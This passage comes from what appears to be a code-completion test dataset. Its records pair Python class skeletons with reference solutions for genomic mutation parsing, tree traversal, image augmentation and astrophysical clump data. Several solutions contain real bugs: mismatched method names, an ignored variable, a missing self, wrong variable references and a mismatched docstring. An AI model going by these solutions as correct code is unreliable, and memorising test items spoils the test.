quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. 
This is broken b/c of the function above\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n<|end_body_0|>\n\n<|body_start_1|>\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n<|end_body_1|>\n\n<|body_start_2|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n<|end_body_2|>\n\n<|body_start_3|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000458", "length_bytes": 12376, "license_type": "no_license", "methods": [{"docstring": "Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data", "name": "__init__", "signature": "def __init__(self, data_dir, sample_name)"}, {"docstring": "Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}", "name": "get_inherited_somatic_mutations", "signature": "def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff)"}, {"docstring": "Write mutations for file", "name": "write_mutations", "signature": "def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile)"}, {"docstring": "Write input for MU2A for inherited and somatic mutations. 
This is broken b/c of the function above", "name": "mk_MU2A_input", "signature": "def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_001118", "prompt": "Implement the Python class `calls` described below.\n\nClass description:\nSimple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\n\nMethod signatures and docstrings:\n- def __init__(self, data_dir, sample_name): Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\n- def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff): Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\n- def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile): Write mutations for file\n- def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file): Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above", "prompted_full_text": "Implement the Python class `calls` described below.\n\nClass description:\nSimple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\n\nMethod signatures and docstrings:\n- def __init__(self, data_dir, sample_name): Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\n- def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff): Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\n- def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile): Write mutations for file\n- def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file): Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above\n\n<|skeleton|>\nclass calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n <|body_0|>\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n <|body_1|>\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n <|body_2|>\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. 
This is broken b/c of the function above\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n<|end_body_0|>\n\n<|body_start_1|>\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n<|end_body_1|>\n\n<|body_start_2|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n<|end_body_2|>\n\n<|body_start_3|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n<|end_body_3|>\n", "revision_id": "6565975357bb944f7a4b3d1b2e502ca3cf9d2312", "skeleton": "<|skeleton|>\nclass calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n <|body_0|>\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n <|body_1|>\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n <|body_2|>\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. 
This is broken b/c of the function above\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. 
This is broken b/c of the function above\"\"\"\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n", "source": "the_stack_v2_python_sparse", "source_path": "call_class.py", "source_repo": "samesense/loh", "split": "test", "star_events_count": 0} {"blob_id": "8c92b85d7fd65836ccfebdc63523d73953e6148f", "bodies": ["if not root:\n return []\nres = []\n\ndef digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\ndigui(root)\nreturn res", "if not root:\n return []\nres = []\nstack = [root]\nwhile stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\nreturn res[::-1]"], "bodies_text": "<|body_start_0|>\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n <|body_0|>\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000459", "length_bytes": 1058, "license_type": "no_license", "methods": [{"docstring": "递归", "name": "postorder", "signature": "def postorder(self, root: 'Node') -> List[int]"}, {"docstring": "迭代", "name": "postorder1", "signature": "def postorder1(self, root: 'Node') -> List[int]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007205", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def postorder(self, root: 'Node') -> List[int]: 递归\n- def postorder1(self, root: 'Node') -> List[int]: 迭代", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def postorder(self, root: 'Node') -> List[int]: 递归\n- def postorder1(self, root: 'Node') -> List[int]: 迭代\n\n<|skeleton|>\nclass Solution:\n\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n <|body_0|>\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n 
res.append(node.val)\n return res[::-1]\n<|end_body_1|>\n", "revision_id": "069bb0b751ef7f469036b9897436eb5d138ffa24", "skeleton": "<|skeleton|>\nclass Solution:\n\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n <|body_0|>\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n", "source": "the_stack_v2_python_sparse", "source_path": "算法/Week_02/590. N叉树的后序遍历.py", "source_repo": "RichieSong/algorithm", "split": "test", "star_events_count": 0} {"blob_id": "e1426244087fa354b7844654903b2583fd590fb6", "bodies": ["self.num = num\nself.magnitude = magnitude\nself.prob = prob\nself.magnitude_std = magnitude_std", "transforms = []\nif self.prob < 1.0 and random.random() > self.prob:\n return img\nfor name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\nops = np.random.choice(transforms, self.num)\nfor op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\nreturn img"], "bodies_text": "<|body_start_0|>\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n<|end_body_0|>\n\n<|body_start_1|>\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n<|end_body_1|>\n", "class_docstring": "Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int", "class_name": "AutoAugment", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0", "BSD-3-Clause", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. 
:type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n <|body_0|>\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n<|end_body_0|>\n\n<|body_start_1|>\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000460", "length_bytes": 2814, "license_type": "permissive", "methods": [{"docstring": "Construct the AutoContrast class.", "name": "__init__", "signature": "def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5)"}, {"docstring": "Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor", "name": "__call__", "signature": "def __call__(self, img)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002473", "prompt": "Implement the Python class `AutoAugment` described below.\n\nClass description:\nApplies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\n\nMethod signatures and docstrings:\n- def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5): Construct the AutoContrast class.\n- def __call__(self, img): Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor", "prompted_full_text": "Implement the Python class `AutoAugment` described below.\n\nClass description:\nApplies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\n\nMethod signatures and docstrings:\n- def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5): Construct the AutoContrast class.\n- def __call__(self, img): Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\n\n<|skeleton|>\nclass AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n <|body_0|>\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. 
:param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n<|end_body_0|>\n\n<|body_start_1|>\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n<|end_body_1|>\n", "revision_id": "12e37a1991eb6771a2999fe0a46ddda920c47948", "skeleton": "<|skeleton|>\nclass AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n <|body_0|>\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. 
:param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n", "source": "the_stack_v2_python_sparse", "source_path": "vega/datasets/transforms/AutoAugment.py", "source_repo": "huawei-noah/vega", "split": "test", "star_events_count": 850} {"blob_id": "3632abcc7439085ef88503d6add1e4a6ed58b512", "bodies": ["self.clumpids = np.zeros(1)\nself.parent = np.zeros(1)\nself.level = np.zeros(1)\nreturn", "if par.verbose:\n print('Reading clump data.')\nout = p.z0\nraw_data = [None for i in range(par.ncpu)]\ndirnrstr = str(par.outputnrs[out]).zfill(5)\ndirname = 'output_' + dirnrstr\ni = 0\nfor cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\nfulldata = np.concatenate(raw_data[:i], axis=0)\nself.clumpids = fulldata[:, 0]\nself.level = fulldata[:, 1]\nself.parent = fulldata[:, 2]\nreturn", "for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\nreturn", "children = []\nlast_added = [clumpid]\nloopcounter = 0\nwhile True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\nreturn children[1:]", "hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\nf = open(hfile, 'w')\nf.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\nnc = len(children)\ndumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\ndumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\nf.write(dumpstring)\nf.close()\nreturn"], "bodies_text": "<|body_start_0|>\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n 
return\n<|end_body_1|>\n\n<|body_start_2|>\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n<|end_body_2|>\n\n<|body_start_3|>\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n<|end_body_3|>\n\n<|body_start_4|>\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n<|end_body_4|>\n", "class_docstring": "Data from clump_XXXXX.txtYYYYY", "class_name": "clumpdata", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n <|body_0|>\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n <|body_1|>\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n <|body_2|>\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n <|body_3|>\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. 
